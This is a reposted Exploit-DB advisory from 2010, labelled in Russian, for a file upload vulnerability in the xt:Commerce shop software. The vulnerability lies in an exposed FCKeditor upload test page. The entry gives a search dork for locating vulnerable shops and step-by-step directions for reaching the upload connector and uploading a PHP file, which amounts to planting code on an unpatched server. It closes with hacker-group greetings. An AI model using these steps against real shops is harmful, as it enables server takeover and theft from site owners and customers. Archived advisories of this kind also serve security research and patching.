- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15455
- Проверка EDB
-
- Пройдено
- Автор
- NET.EDIT0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-11-08
Код:
=============================================================
xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability
=============================================================
###################################################
#
# Exploit Title: xt:Commerce Shopsoftware (fckeditor)
# Date: 08/11/2010
# Author: Net.Edit0r
# Software Link: www.xt-commerce.com/
# Version: 3 & 4
# Tested on: Linux Ubuntu 9.04
# dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
# Contact: [email protected] ~ [email protected]
#
####################################################
exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
first go to # http://site.com/[shop]
then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
select # Select the "File Uploader"> php ... upload to : Uploaded
File URL:
Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
#######################################################
Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan , P0W3RFU7
BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ B3hz4d ~ Raiden ~ m4hd1
- Источник
- www.exploit-db.com